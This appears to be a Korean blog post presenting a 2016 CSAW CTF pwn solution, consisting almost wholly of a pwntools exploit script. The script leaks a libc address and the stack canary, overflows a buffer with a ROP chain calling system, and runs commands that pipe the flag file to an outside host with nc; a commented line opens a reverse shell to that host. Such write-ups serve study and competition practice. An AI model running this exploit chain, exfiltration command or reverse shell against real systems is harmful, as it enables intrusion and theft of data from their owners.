튜기's blogggg

2016 CSAW CTF Tutorial

by St1tch




from pwn import *
import stitch

local = False
if local :
    s = remote('localhost', 8005)
else :
    s = remote('pwn.chal.csaw.io', 8002)
raw_input()

def solve() :
    p.status('leak puts addr')
    s.recvuntil('>')
    sleep(1)
    s.sendline('1')
    puts = int(s.recvuntil('\n').split(':')[1].strip('0x'), 16) + 1280
    libc = stitch.find_libc({'puts':hex(puts)[-3:]})[0]
    offset = puts - libc['puts']
    poprdi = offset + libc['poprdi_ret']
    system = offset + libc['system']

    log.success('puts addr = %s'%(hex(puts)))
    log.success('system addr = %s'%(hex(system)))
    log.success('poprdi addr = %s'%(hex(poprdi)))

    p.status('leak canary')
    s.recvuntil('>')
    sleep(1)
    s.sendline('2')
    sleep(1)
    s.recvuntil('>')
    s.sendline('a'* 0x137)

    s.recv(0x138)
    canary = u64(s.recv(8))
    rbp = 0x00007fff00000000 + u32(s.recv(4)) - 48

    log.success('rbp = %s'%(hex(rbp)))
    log.success('canary = %s'%(hex(canary)))

    p.status('remote shell!')
    s.recvuntil('>')
    sleep(1)
    s.sendline('2')
    s.recvuntil('>')
    #cmd = 'ls | nc kimtae.xyz 8888\x00'
    cmd = 'cat flag.txt | nc kimtae.xyz 8888\x00'
    #cmd = 'nc kimtae.xyz 8888 | /bin/sh | nc kimtae.xyz 8889\x00'
    pay = 'a' * 0x138
    pay += p64(canary)
    pay += 'a'*8
    pay += p64(poprdi)
    pay += p64(rbp+32)
    pay += p64(system)
    pay += cmd
    sleep(1)
    s.sendline(pay)

    p.success('Sending cmd!')
    s.interactive()

if __name__ == '__main__' :
    p = log.progress('Start pwning...')
    solve()



블로그의 정보

튜기's blogg(st1tch)

St1tch

활동하기